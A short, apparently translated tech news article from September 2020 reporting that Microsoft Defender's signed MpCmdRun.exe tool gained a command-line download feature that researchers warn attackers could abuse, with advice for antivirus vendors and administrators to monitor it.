September 21, 2020

Microsoft Defender allows it to download malware and other files

2 min read

Microsoft recently pushed updates to the Microsoft Defender antivirus software to bring new features that allow downloading resources from the Internet through the command line.

This has aroused the vigilance of some security researchers because hackers can also use this function to download malicious files and store them locally to initiate launch attacks from the local.

Fortunately, even the files downloaded through its own features are scanned by Microsoft Defender, so most malware should be successfully blocked.

It stands to reason that since Microsoft will also perform security scans on the files it downloads.

In that case, why should security researchers worry about security threats to this new feature of Microsoft? In fact, researchers are not worried about third parties.

What Microsoft added this time belongs to the Microsoft Defender command-line tool MpCmdRun.exe, which naturally also carries the official Microsoft signature.

Although Microsoft will detect the files downloaded through the command line tool itself, it is difficult whether third-party anti-virus software will also detect the files downloaded by the Microsoft tool.

When the user installs third-party antivirus software, Microsoft Defender will be closed, but the command-line tool can still be used and files can be downloaded.

Since the tool is signed by Microsoft and is executed through the command line, the attacker can execute it quietly in the background and will not let the user see the operation interface.

If the third-party anti-virus software does not implement strict download detection, it may cause the attacker to download malicious files and execute files through the command line.

Researchers recommend that third-party anti-virus software update security policies in a timely manner and enterprise administrators also need to use software to monitor the tool to prevent hackers from using it.

Microsoft officials did not release a detailed explanation on the matter, and the company did not explain why it provided download functions to the tool.

Via: bleepingcomputer